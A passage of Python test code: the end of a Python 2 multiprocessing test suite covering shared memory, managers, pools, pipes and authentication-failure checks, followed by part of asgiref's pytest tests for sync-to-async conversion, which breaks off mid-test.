for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if self.TYPE != 'processes':
return
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
if self.TYPE != 'processes':
return
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
class _TestArray(BaseTestCase):
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
def test_array(self, raw=False):
if self.TYPE != 'processes':
return
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
def test_rawarray(self):
self.test_array(raw=True)
def test_getobj_getlock_obj(self):
if self.TYPE != 'processes':
return
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
try:
from ctypes import Structure, Value, copy, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
if c_int is None:
return
x = Value('i', 7, lock=lock)
y = Value(ctypes.c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = Array('d', range(10), lock=lock)
string = Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
if c_int is None:
return
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call mutliprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = (
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.reduction', 'multiprocessing.sharedctypes',
'multiprocessing.synchronize', 'multiprocessing.util'
)
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
def _test_level(self, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
self.Process(target=self._test_level, args=(writer,)).start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
#
# Functions used to create test cases from the base ones in this module
#
def get_attributes(Source, names):
d = {}
for name in names:
obj = getattr(Source, name)
if type(obj) == type(get_attributes):
obj = staticmethod(obj)
d[name] = obj
return d
def create_test_cases(Mixin, type):
result = {}
glob = globals()
Type = type[0].upper() + type[1:]
for name in glob.keys():
if name.startswith('_Test'):
base = glob[name]
if type in base.ALLOWED_TYPES:
newname = 'With' + Type + name[1:]
class Temp(base, unittest.TestCase, Mixin):
pass
result[newname] = Temp
Temp.__name__ = newname
Temp.__module__ = Mixin.__module__
return result
#
# Create test cases
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
locals().update(get_attributes(multiprocessing, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'RawValue',
'RawArray', 'current_process', 'active_children', 'Pipe',
'connection', 'JoinableQueue'
)))
testcases_processes = create_test_cases(ProcessesMixin, type='processes')
globals().update(testcases_processes)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
manager = object.__new__(multiprocessing.managers.SyncManager)
locals().update(get_attributes(manager, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'list', 'dict',
'Namespace', 'JoinableQueue'
)))
testcases_manager = create_test_cases(ManagerMixin, type='manager')
globals().update(testcases_manager)
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
locals().update(get_attributes(multiprocessing.dummy, (
'Queue', 'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore',
'Condition', 'Event', 'Value', 'Array', 'current_process',
'active_children', 'Pipe', 'connection', 'dict', 'list',
'Namespace', 'JoinableQueue'
)))
testcases_threads = create_test_cases(ThreadsMixin, type='threads')
globals().update(testcases_threads)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
testcases_other = [OtherTest]
#
#
#
def test_main(run=None):
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
from test.test_support import TestSkipped
raise TestSkipped("OSError raises on RLock creation, see issue 3111!")
if run is None:
from test.test_support import run_unittest as run
util.get_temp_dir() # creates temp directory for use by all processes
multiprocessing.get_logger().setLevel(LOG_LEVEL)
ProcessesMixin.pool = multiprocessing.Pool(4)
ThreadsMixin.pool = multiprocessing.dummy.Pool(4)
ManagerMixin.manager.__init__()
ManagerMixin.manager.start()
ManagerMixin.pool = ManagerMixin.manager.Pool(4)
testcases = (
sorted(testcases_processes.values(), key=lambda tc:tc.__name__) +
sorted(testcases_threads.values(), key=lambda tc:tc.__name__) +
sorted(testcases_manager.values(), key=lambda tc:tc.__name__) +
testcases_other
)
loadTestsFromTestCase = unittest.defaultTestLoader.loadTestsFromTestCase
suite = unittest.TestSuite(loadTestsFromTestCase(tc) for tc in testcases)
run(suite)
ThreadsMixin.pool.terminate()
ProcessesMixin.pool.terminate()
ManagerMixin.pool.terminate()
ManagerMixin.manager.shutdown()
del ProcessesMixin.pool, ThreadsMixin.pool, ManagerMixin.pool
def main():
test_main(unittest.TextTestRunner(verbosity=2).run)
if __name__ == '__main__':
main()
|
test_sync.py
|
import asyncio
import threading
import time
from concurrent.futures import ThreadPoolExecutor
from functools import wraps
from unittest import TestCase
import pytest
from asgiref.sync import async_to_sync, sync_to_async
@pytest.mark.asyncio
async def test_sync_to_async():
"""
Tests we can call sync functions from an async thread
(even if the number of thread workers is less than the number of calls)
"""
# Define sync function
def sync_function():
time.sleep(1)
return 42
# Ensure outermost detection works
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
start = time.monotonic()
result = await async_function()
end = time.monotonic()
assert result == 42
assert end - start >= 1
# Set workers to 1, call it twice and make sure that works right
loop = asyncio.get_event_loop()
old_executor = loop._default_executor
loop.set_default_executor(ThreadPoolExecutor(max_workers=1))
try:
start = time.monotonic()
await asyncio.wait([async_function(), async_function()])
end = time.monotonic()
# It should take at least 2 seconds as there's only one worker.
assert end - start >= 2
finally:
loop.set_default_executor(old_executor)
@pytest.mark.asyncio
async def test_sync_to_async_decorator():
"""
Tests sync_to_async as a decorator
"""
# Define sync function
@sync_to_async
def test_function():
time.sleep(1)
return 43
# Check it works right
result = await test_function()
assert result == 43
@pytest.mark.asyncio
async def test_nested_sync_to_async_retains_wrapped_function_attributes():
"""
Tests that attributes of functions wrapped by sync_to_async are retained
"""
def enclosing_decorator(attr_value):
@wraps(attr_value)
def wrapper(f):
f.attr_name = attr_value
return f
return wrapper
@enclosing_decorator("test_name_attribute")
@sync_to_async
def test_function():
pass
assert test_function.attr_name == "test_name_attribute"
assert test_function.__name__ == "test_function"
@pytest.mark.asyncio
async def test_sync_to_async_method_decorator():
"""
Tests sync_to_async as a method decorator
"""
# Define sync function
class TestClass:
@sync_to_async
def test_method(self):
time.sleep(1)
return 44
# Check it works right
instance = TestClass()
result = await instance.test_method()
assert result == 44
@pytest.mark.asyncio
async def test_sync_to_async_method_self_attribute():
"""
Tests sync_to_async on a method copies __self__
"""
# Define sync function
class TestClass:
def test_method(self):
time.sleep(0.1)
return 45
# Check it works right
instance = TestClass()
method = sync_to_async(instance.test_method)
result = await method()
assert result == 45
# Check __self__ has been copied
assert method.__self__ == instance
@pytest.mark.asyncio
async def test_async_to_sync_to_async():
"""
Tests we can call async functions from a sync thread created by async_to_sync
(even if the number of thread workers is less than the number of calls)
"""
result = {}
# Define async function
async def inner_async_function():
result["worked"] = True
result["thread"] = threading.current_thread()
return 65
# Define sync function
def sync_function():
return async_to_sync(inner_async_function)()
# Wrap it
async_function = sync_to_async(sync_function)
# Check it works right
number = await async_function()
assert number == 65
assert result["worked"]
# Make sure that it didn't needlessly make a new async loop
assert result["thread"] == threading.current_thread()
def test_async_to_sync():
"""
Tests we can call async_to_sync outside of an outer event loop.
"""
result = {}
# Define async function
async def inner_async_function():
await asyncio.sleep(0)
result["worked"] = True
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
number = sync_function()
assert number == 84
assert result["worked"]
def test_async_to_sync_decorator():
"""
Tests we can call async_to_sync as a function decorator
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
return 85
# Run it
number = test_function()
assert number == 85
assert result["worked"]
def test_async_to_sync_method_decorator():
"""
Tests we can call async_to_sync as a function decorator
"""
result = {}
# Define async function
class TestClass:
@async_to_sync
async def test_function(self):
await asyncio.sleep(0)
result["worked"] = True
return 86
# Run it
instance = TestClass()
number = instance.test_function()
assert number == 86
assert result["worked"]
@pytest.mark.asyncio
async def test_async_to_sync_in_async():
"""
Makes sure async_to_sync bails if you try to call it from an async loop
"""
# Define async function
async def inner_async_function():
return 84
# Run it
sync_function = async_to_sync(inner_async_function)
with pytest.raises(RuntimeError):
sync_function()
def test_async_to_sync_in_thread():
"""
Tests we can call async_to_sync inside a thread
"""
result = {}
# Define async function
@async_to_sync
async def test_function():
await asyncio.sleep(0)
result["worked"] = True
# Make a thread and run it
thread = threading.Thread(target=test_function)
thread.start()
thread.join()
assert result["worked"]
def test_async_to_async_method_self_attribute():
"""
Tests async_to_async on a method copies __self__.
"""
# Define async function.
class TestClass:
async def test_function(self):
await asyncio.sleep(0)
return 45
# Check it works right.
instance = TestClass()
sync_function = async_to_sync(instance.test_function)
number = sync_function()
assert number == 45
# Check __self__ has been copied.
assert sync_function.__self__ is instance
def test_thread_sensitive_outside_sync():
"""
Tests that thread_sensitive SyncToAsync where the outside is sync code runs
in the main thread.
"""
result = {}
# Middle async function
@async_to_sync
async def middle():
await inner()
# Inner sync function
def inner():
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it
middle()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_outside_async():
"""
Tests that thread_sensitive SyncToAsync where the outside is async code runs
in a single, separate thread.
"""
result_1 = {}
result_2 = {}
# Outer sync function
def outer(result):
middle(result)
outer = sync_to_async(outer, thread_sensitive=True)
# Middle async function
@async_to_sync
async def middle(result):
await inner(result)
# Inner sync function
def inner(result):
result["thread"] = threading.current_thread()
inner = sync_to_async(inner, thread_sensitive=True)
# Run it (in supposed parallel!)
await asyncio.wait([outer(result_1), inner(result_2)])
# They should not have run in the main thread, but in the same thread
assert result_1["thread"] != threading.current_thread()
assert result_1["thread"] == result_2["thread"]
def test_thread_sensitive_double_nested_sync():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is sync.
"""
result = {}
# Async level 1
@async_to_sync
async def level1():
await level2()
# Sync level 2
def level2():
level3()
level2 = sync_to_async(level2, thread_sensitive=True)
# Async level 3
@async_to_sync
async def level3():
await level4()
# Sync level 2
def level4():
result["thread"] = threading.current_thread()
level4 = sync_to_async(level4, thread_sensitive=True)
# Run it
level1()
assert result["thread"] == threading.current_thread()
@pytest.mark.asyncio
async def test_thread_sensitive_double_nested_async():
"""
Tests that thread_sensitive SyncToAsync nests inside itself where the
outside is async.
"""
result = {}
